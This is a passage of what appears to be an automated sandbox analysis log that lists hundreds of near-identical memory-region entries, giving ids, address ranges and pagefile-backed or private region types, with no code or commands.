start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13767 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13768 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13769 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13774 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13775 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13776 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13777 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13778 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13779 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13780 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13781 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13782 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13783 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13810 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13811 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13848 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13849 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13852 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13853 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13857 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13858 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13859 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13860 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13862 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13863 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13869 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13870 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13871 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13872 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13873 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13874 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13875 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13876 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13883 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13884 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13885 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13886 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13887 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13888 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13889 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13897 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13898 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13899 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13900 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13908 start_va = 0x1e80000 end_va = 0x1e81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13909 start_va = 0x49d0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 13910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13922 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 13923 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13924 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 13925 start_va = 0x4a00000 end_va = 0x4a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 13926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13952 start_va = 0x610000 end_va = 0x61efff monitored = 